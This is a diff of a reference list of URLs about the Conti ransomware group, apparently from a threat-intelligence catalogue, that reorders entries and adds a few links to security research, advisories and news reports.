- "https://securelist.com/luna-black-basta-ransomware/106950",
- "https://marcoramilli.com/2021/11/07/conti-ransomware-cheat-sheet/",
- "https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-2",
- "https://medium.com/@arnozobec/analyzing-conti-leaks-without-speaking-russian-only-methodology-f5aecc594d1b",
- "https://us-cert.cisa.gov/ncas/alerts/aa21-265a",
- "https://www.esentire.com/blog/analysis-of-leaked-conti-intrusion-procedures-by-esentires-threat-response-unit-tru",
- "https://www.advintel.io/post/24-hours-from-log4shell-to-local-admin-deep-dive-into-conti-gang-attack-on-fortune-500-dfir",
- "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/",
- "https://krebsonsecurity.com/2021/10/conti-ransom-gang-starts-selling-access-to-victims/",
- "https://research.nccgroup.com/2022/04/29/adventures-in-the-land-of-bumblebee-a-new-malicious-loader/",
- "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
- "https://research.checkpoint.com/2022/leaks-of-conti-ransomware-group-paint-picture-of-a-surprisingly-normal-tech-start-up-sort-of/",
- "https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-conti",
- "https://blog.qualys.com/vulnerabilities-threat-research/2021/11/18/conti-ransomware",
- "https://cocomelonc.github.io/investigation/2022/04/11/malw-inv-conti-2.html",
- "https://www.coveware.com/blog/2022/1/26/ransomware-as-a-service-innovation-curve",
- "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
- "https://www.fortinet.com/blog/threat-research/diavol-new-ransomware-used-by-wizard-spider",
- "https://www.silentpush.com/blog/consequences-the-conti-leaks-and-future-problems",
- "https://www.cyberscoop.com/ransomware-gang-conti-bounced-back/",
- "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
- "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire",
 "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf",
- "https://attackiq.com/2022/06/15/attack-graph-emulating-the-conti-ransomware-teams-behaviors/",
- "https://lifars.com/wp-content/uploads/2021/10/ContiRansomware_Whitepaper.pdf",
- "https://www.clearskysec.com/wp-content/uploads/2021/02/Conti-Ransomware.pdf",
- "https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65",
- "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox",
- "https://www.eldiario.es/tecnologia/capos-cibercrimen-avisan-contratacaran-si-hackea-rusia_1_8795458.html",
- "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
- "https://www.advintel.io/post/ransomware-advisory-log4shell-exploitation-for-initial-access-lateral-movement",
- "https://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
- "https://www.dragos.com/blog/industry-news/suspected-conti-ransomware-activity-in-the-auto-manufacturing-sector/",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships",
- "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://cocomelonc.github.io/investigation/2022/03/27/malw-inv-conti-1.html",
- "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html",
- "https://cocomelonc.github.io/tutorial/2022/04/02/malware-injection-18.html",
- "https://www.ironnet.com/blog/ransomware-graphic-blog",
- "https://www.dragos.com/blog/industry-news/dragos-ics-ot-ransomware-analysis-q4-2021/",
- "https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/",
- "https://securityaffairs.com/141666/cyber-crime/lockbit-green-ransomware-variant.html",
- "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/",
- "https://www.trmlabs.com/post/analysis-corroborates-suspected-ties-between-conti-and-ryuk-ransomware-groups-and-wizard-spider",
- "https://github.com/whichbuffer/Conti-Ransomware-IOC",
- "https://arcticwolf.com/resources/blog/karakurt-web",
- "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/",
- "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://nakedsecurity.sophos.com/2021/08/06/conti-ransomware-affiliate-goes-rogue-leaks-company-data/",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-group-targets-esxi-hypervisors-with-its-linux-variant.html",
- "https://www.ncsc.gov.ie/pdfs/HSE_Conti_140521_UPDATE.pdf",
- "https://www.cynet.com/attack-techniques-hands-on/shelob-moonlight-spinning-a-larger-web/",
- "https://documents.trendmicro.com/assets/pdf/datasheet-ransomware-in-Q1-2022.pdf",
- "https://www.connectwise.com/resources/conti-profile",
- "https://unit42.paloaltonetworks.com/conti-ransomware-gang/",
- "https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/",
- "http://chuongdong.com/reverse%20engineering/2020/12/15/ContiRansomware/",
- "https://therecord.media/conti-leaks-the-panama-papers-of-ransomware/",
- "https://intel471.com/blog/conti-leaks-cybercrime-fire-team",
- "https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware",
- "https://news.sophos.com/en-us/2021/02/16/conti-ransomware-evasive-by-nature/",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
- "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/",
- "https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-1",
- "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/",
- "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape",
- "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://yoroi.company/research/conti-ransomware-source-code-a-well-designed-cots-ransomware/",
- "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks",
- "https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx",
- "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
- "https://www.bleepingcomputer.com/news/security/taiwanese-apple-and-tesla-contractor-hit-by-conti-ransomware/",
- "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
- "https://blog.talosintelligence.com/2021/09/Conti-leak-translation.html",
- "https://cybersecurity.att.com/blogs/security-essentials/stories-from-the-soc-powershell-proxyshell-conti-ttps-oh-my",
- "https://areteir.com/wp-content/uploads/2020/08/Arete_Insight_Is-Conti-the-new-Ryuk_August2020.pdf",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://securelist.com/modern-ransomware-groups-ttps/106824/",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.advanced-intel.com/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent",
- "https://www.bankinfosecurity.com/cybercrime-moves-conti-ransomware-absorbs-trickbot-malware-a-18573",
- "https://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware",
- "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf",
- "https://www.secureworks.com/blog/gold-ulrick-continues-conti-operations-despite-public-disclosures",
- "https://www.ic3.gov/Media/News/2021/210521.pdf",
- "https://damonmccoy.com/papers/Ransomware_eCrime22.pdf",
- "https://news.sophos.com/en-us/2021/02/16/what-to-expect-when-youve-been-hit-with-conti-ransomware/",
- "https://arcticwolf.com/resources/blog/conti-ransomware-leak-analyzed",
- "https://medium.com/@whickey000/how-i-cracked-conti-ransomware-groups-leaked-source-code-zip-file-e15d54663a8",
- "https://www.bleepingcomputer.com/news/security/hackers-use-contis-leaked-ransomware-to-attack-russian-companies/",
- "https://cocomelonc.github.io/malware/2023/02/10/malware-analysis-8.html",
- "https://assets.sentinelone.com/ransomware-enterprise/conti-ransomware-unpacked",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
- "https://news.sophos.com/en-us/2022/02/28/conti-and-karma-actors-attack-healthcare-provider-at-same-time-through-proxyshell-exploits/?cmp=30728",
- "https://www.darktrace.com/en/blog/the-double-extortion-business-conti-ransomware-gang-finds-new-avenues-of-negotiation/",
- "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel",
- "https://redcanary.com/blog/intelligence-insights-november-2021/",
- "https://therecord.media/conti-ransomware-gang-chats-leaked-by-pro-ukraine-member/",
- "https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/",
- "https://www.bleepingcomputer.com/news/security/conti-ransomware-source-code-leaked-by-ukrainian-researcher/",
- "https://www.bleepingcomputer.com/news/security/conti-ransomwares-internal-chats-leaked-after-siding-with-russia/",
- "https://www.youtube.com/watch?v=cYx7sQRbjGA",
- "https://thedfirreport.com/2021/05/12/conti-ransomware/",
- "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/",
- "https://www.hse.ie/eng/services/publications/conti-cyber-attack-on-the-hse-full-report.pdf",
- "https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/",
- "https://www.threatstop.com/blog/conti-ransomware-source-code-leaked",
- "https://blogs.vmware.com/security/2022/09/threat-report-illuminating-volume-shadow-deletion.html",
- "https://www.prevailion.com/what-wicked-webs-we-unweave/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks",
- "https://www.youtube.com/watch?v=hmaWy9QIC7c",
- "https://0xthreatintel.medium.com/reversing-conti-ransomware-bfce15019e74",
- "https://threatpost.com/affiliate-leaks-conti-ransomware-playbook/168442/",
- "https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-one",
- "https://threatpost.com/conti-ransomware-v-3-including-decryptor-leaked/179006/",
- "https://blog.talosintelligence.com/2022/05/conti-and-hive-ransomware-operations.html",
- "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
- "https://cyware.com/news/ransomware-becomes-deadlier-conti-makes-the-most-money-39e17bae/",
- "https://news.sophos.com/en-us/2022/02/22/cyberthreats-during-russian-ukrainian-tensions-what-can-we-learn-from-history-to-be-prepared/",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
- "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
 "https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/",
- "https://news.sophos.com/en-us/2021/02/16/conti-ransomware-attack-day-by-day/",
- "https://www.bleepingcomputer.com/news/security/angry-conti-ransomware-affiliate-leaks-gangs-attack-playbook/",
- "https://www.prodaft.com/m/reports/Conti_TLPWHITE_v1.6_WVcSEtc.pdf",
- "https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/the-sound-of-malware.html",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf?1651576098",
- "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
- "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/",
- "https://intel471.com/blog/conti-vs-monti-a-reinvention-or-just-a-simple-rebranding",
- "https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/",
- "https://blog.reversinglabs.com/blog/conversinglabs-ep-2-conti-pivots-as-ransomware-as-a-service-struggles",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
- "https://intel471.com/blog/shipping-companies-ransomware-credentials",
- "https://research.nccgroup.com/2022/03/31/conti-nuation-methods-and-techniques-observed-in-operations-post-the-leaks/",
- "https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/",
- "https://www.advintel.io/post/hydra-with-three-heads-blackbyte-the-future-of-ransomware-subsidiary-groups",
- "https://www.truesec.com/hub/blog/proxyshell-qbot-and-conti-ransomware-combined-in-a-series-of-cyber-attacks",
- "https://cluster25.io/2022/03/02/contis-source-code-deep-dive-into/",
- "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
- "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide",
- "https://github.com/TheParmak/conti-leaks-englished",
- "https://www.cyberark.com/resources/threat-research-blog/conti-group-leaked",
- "https://twitter.com/AltShiftPrtScn/status/1417849181012647938",
- "https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again",
- "https://www.advintel.io/post/backup-removal-solutions-from-conti-ransomware-with-love",
- "https://www.youtube.com/watch?v=uORuVVQzZ0A",
- "https://www.bleepingcomputer.com/news/security/conti-ransomware-gang-takes-over-trickbot-malware-operation/",
- "https://www.elliptic.co/blog/conti-ransomware-nets-at-least-25.5-million-in-four-months",
- "https://www.mbsd.jp/2022/03/08/assets/images/MBSD_Summary_of_ContiLeaks_Rev3.pdf",
- "https://www.zscaler.com/blogs/security-research/conti-ransomware-attacks-persist-updated-version-despite-leaks",
- "https://twitter.com/TheDFIRReport/status/1498642512935800833",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-by-the-numbers/lockbit-conti-and-blackcat-lead-pack-amid-rise-in-active-raas-and-extortion-groups-ransomware-in-q1-2022",
- "https://securityandtechnology.org/wp-content/uploads/2021/04/IST-Ransomware-Task-Force_Final_Report.pdf",
- "https://www.redhotcyber.com/post/il-ransomware-conti-si-schiera-a-favore-della-russia",
+ "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
+ "https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships",
+ "https://www.bankinfosecurity.com/cybercrime-moves-conti-ransomware-absorbs-trickbot-malware-a-18573",
+ "https://thedfirreport.com/2021/05/12/conti-ransomware/",
+ "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/",
+ "https://cocomelonc.github.io/tutorial/2022/04/02/malware-injection-18.html",
+ "https://github.com/whichbuffer/Conti-Ransomware-IOC",
+ "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire",
 "https://www.mbsd.jp/research/20210413/conti-ransomware/",
- "https://github.com/cdong1012/ContiUnpacker",
- "https://thehackernews.com/2022/05/malware-analysis-trickbot.html",
- "https://twitter.com/AltShiftPrtScn/status/1350755169965924352",
+ "https://nakedsecurity.sophos.com/2021/08/06/conti-ransomware-affiliate-goes-rogue-leaks-company-data/",
+ "https://www.advanced-intel.com/post/hunting-for-corporate-insurance-policies-indicators-of-ransom-exfiltrations",
+ "https://www.advanced-intel.com/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
 "https://thedfirreport.com/2021/12/13/diavol-ransomware/",
- "https://twitter.com/AltShiftPrtScn/status/1423188974298861571",
- "https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/",
+ "https://www.threatstop.com/blog/conti-ransomware-source-code-leaked",
+ "https://cybersecurity.att.com/blogs/security-essentials/stories-from-the-soc-powershell-proxyshell-conti-ttps-oh-my",
+ "https://www.bleepingcomputer.com/news/security/angry-conti-ransomware-affiliate-leaks-gangs-attack-playbook/",
+ "https://www.eldiario.es/tecnologia/capos-cibercrimen-avisan-contratacaran-si-hackea-rusia_1_8795458.html",
+ "https://research.nccgroup.com/2022/04/29/adventures-in-the-land-of-bumblebee-a-new-malicious-loader/",
+ "https://twitter.com/AltShiftPrtScn/status/1350755169965924352",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
+ "https://www.advintel.io/post/ransomware-advisory-log4shell-exploitation-for-initial-access-lateral-movement",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf?1651576098",
+ "https://www.redhotcyber.com/post/il-ransomware-conti-si-schiera-a-favore-della-russia",
+ "https://intel471.com/blog/shipping-companies-ransomware-credentials",
+ "https://securityaffairs.com/141666/cyber-crime/lockbit-green-ransomware-variant.html",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks",
+ "https://www.bleepingcomputer.com/news/security/ryuk-successor-conti-ransomware-releases-data-leak-site/",
+ "https://www.cyberscoop.com/ransomware-gang-conti-bounced-back/",
+ "https://www.darktrace.com/en/blog/the-double-extortion-business-conti-ransomware-gang-finds-new-avenues-of-negotiation/",
+ "https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/",
+ "https://www.ic3.gov/Media/News/2021/210521.pdf",
+ "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/the-sound-of-malware.html",
+ "https://www.truesec.com/hub/blog/proxyshell-qbot-and-conti-ransomware-combined-in-a-series-of-cyber-attacks",
+ "https://www.bleepingcomputer.com/news/security/hhs-conti-ransomware-encrypted-80-percent-of-irelands-hse-it-systems/",
+ "https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/",
 "https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/",
 "https://share.vx-underground.org/Conti/",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/",
+ "https://documents.trendmicro.com/assets/pdf/datasheet-ransomware-in-Q1-2022.pdf",
 "https://www.prodaft.com/m/reports/WizardSpider_TLPWHITE_v.1.4.pdf",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://securityaffairs.co/wordpress/128190/cyber-crime/conti-ransomware-takes-over-trickbot.html",
- "https://www.advanced-intel.com/post/hunting-for-corporate-insurance-policies-indicators-of-ransom-exfiltrations",
- "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://therecord.media/disgruntled-ransomware-affiliate-leaks-the-conti-gangs-technical-manuals/",
- "https://blogs.blackberry.com/en/2022/09/the-curious-case-of-monti-ransomware-a-real-world-doppelganger",
- "https://www.bleepingcomputer.com/news/security/ryuk-successor-conti-ransomware-releases-data-leak-site/",
+ "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/",
+ "https://medium.com/@whickey000/how-i-cracked-conti-ransomware-groups-leaked-source-code-zip-file-e15d54663a8",
+ "https://cluster25.io/2022/03/02/contis-source-code-deep-dive-into/",
+ "https://twitter.com/AltShiftPrtScn/status/1417849181012647938",
+ "https://www.advintel.io/post/24-hours-from-log4shell-to-local-admin-deep-dive-into-conti-gang-attack-on-fortune-500-dfir",
+ "http://chuongdong.com/reverse%20engineering/2020/12/15/ContiRansomware/",
+ "https://www.elliptic.co/blog/conti-ransomware-nets-at-least-25.5-million-in-four-months",
+ "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
+ "https://www.dragos.com/blog/industry-news/dragos-ics-ot-ransomware-analysis-q4-2021/",
+ "https://www.advintel.io/post/backup-removal-solutions-from-conti-ransomware-with-love",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
+ "https://us-cert.cisa.gov/ncas/alerts/aa21-265a",
+ "https://cocomelonc.github.io/malware/2023/02/10/malware-analysis-8.html",
+ "https://cocomelonc.github.io/investigation/2022/03/27/malw-inv-conti-1.html",
+ "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox",
+ "https://news.sophos.com/en-us/2022/02/28/conti-and-karma-actors-attack-healthcare-provider-at-same-time-through-proxyshell-exploits/?cmp=30728",
+ "https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again",
+ "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
 "https://medium.com/cycraft/the-road-to-ransomware-resilience-c1ca37036efd",
+ "https://thehackernews.com/2022/05/malware-analysis-trickbot.html",
+ "https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware",
+ "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf",
+ "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html",
+ "https://blog.reversinglabs.com/blog/conversinglabs-ep-2-conti-pivots-as-ransomware-as-a-service-struggles",
+ "https://blogs.blackberry.com/en/2022/09/the-curious-case-of-monti-ransomware-a-real-world-doppelganger",
+ "https://krebsonsecurity.com/2021/10/conti-ransom-gang-starts-selling-access-to-victims/",
+ "https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-one",
+ "https://threatpost.com/conti-ransomware-v-3-including-decryptor-leaked/179006/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://www.esentire.com/blog/analysis-of-leaked-conti-intrusion-procedures-by-esentires-threat-response-unit-tru",
+ "https://www.bleepingcomputer.com/news/security/conti-ransomwares-internal-chats-leaked-after-siding-with-russia/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://securelist.com/luna-black-basta-ransomware/106950",
+ "https://www.secureworks.com/blog/gold-ulrick-continues-conti-operations-despite-public-disclosures",
+ "https://www.first.org/resources/papers/conf2023/FIRSTCON23-TLPCLEAR-Staubmann-Busy-Bees.pptx",
+ "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti",
+ "https://www.cynet.com/attack-techniques-hands-on/shelob-moonlight-spinning-a-larger-web/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://therecord.media/conti-leaks-the-panama-papers-of-ransomware/",
+ "https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware",
+ "https://www.ironnet.com/blog/ransomware-graphic-blog",
+ "https://www.fortinet.com/blog/threat-research/diavol-new-ransomware-used-by-wizard-spider",
+ "https://news.sophos.com/en-us/2021/02/16/conti-ransomware-evasive-by-nature/",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://github.com/cdong1012/ContiUnpacker",
+ "https://therecord.media/disgruntled-ransomware-affiliate-leaks-the-conti-gangs-technical-manuals/",
+ "https://www.mbsd.jp/2022/03/08/assets/images/MBSD_Summary_of_ContiLeaks_Rev3.pdf",
+ "https://securelist.com/modern-ransomware-groups-ttps/106824/",
+ "https://threatpost.com/affiliate-leaks-conti-ransomware-playbook/168442/",
+ "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/",
+ "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel",
+ "https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65",
+ "https://www.advintel.io/post/hydra-with-three-heads-blackbyte-the-future-of-ransomware-subsidiary-groups",
+ "https://attackiq.com/2022/06/15/attack-graph-emulating-the-conti-ransomware-teams-behaviors/",
+ "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/",
+ "https://www.clearskysec.com/wp-content/uploads/2021/02/Conti-Ransomware.pdf",
+ "https://github.com/EmissarySpider/ransomware-descendants",
+ "https://www.dragos.com/blog/industry-news/suspected-conti-ransomware-activity-in-the-auto-manufacturing-sector/",
+ "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide",
+ "https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-1",
+ "https://0xthreatintel.medium.com/reversing-conti-ransomware-bfce15019e74",
+ "https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html",
+ "https://arcticwolf.com/resources/blog/conti-ransomware-leak-analyzed",
+ "https://www.youtube.com/watch?v=cYx7sQRbjGA",
+ "https://blogs.vmware.com/security/2022/09/threat-report-illuminating-volume-shadow-deletion.html",
+ "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-group-targets-esxi-hypervisors-with-its-linux-variant.html",
+ "https://securityandtechnology.org/wp-content/uploads/2021/04/IST-Ransomware-Task-Force_Final_Report.pdf",
+ "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/",
+ "https://www.bleepingcomputer.com/news/security/taiwanese-apple-and-tesla-contractor-hit-by-conti-ransomware/",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://intel471.com/blog/conti-vs-monti-a-reinvention-or-just-a-simple-rebranding",
+ "https://therecord.media/conti-ransomware-gang-chats-leaked-by-pro-ukraine-member/",
+ "https://blog.talosintelligence.com/2021/09/Conti-leak-translation.html",
+ "https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/",
+ "https://www.ncsc.gov.ie/pdfs/HSE_Conti_140521_UPDATE.pdf",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://areteir.com/wp-content/uploads/2020/08/Arete_Insight_Is-Conti-the-new-Ryuk_August2020.pdf",
+ "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
+ "https://www.connectwise.com/resources/conti-profile",
+ "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
+ "https://www.hse.ie/eng/services/publications/conti-cyber-attack-on-the-hse-full-report.pdf",
+ "https://blog.talosintelligence.com/2022/05/conti-and-hive-ransomware-operations.html",
+ "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/",
+ "https://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://research.checkpoint.com/2022/leaks-of-conti-ransomware-group-paint-picture-of-a-surprisingly-normal-tech-start-up-sort-of/",
+ "https://www.cyberark.com/resources/threat-research-blog/conti-group-leaked",
+ "https://github.com/TheParmak/conti-leaks-englished",
+ "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
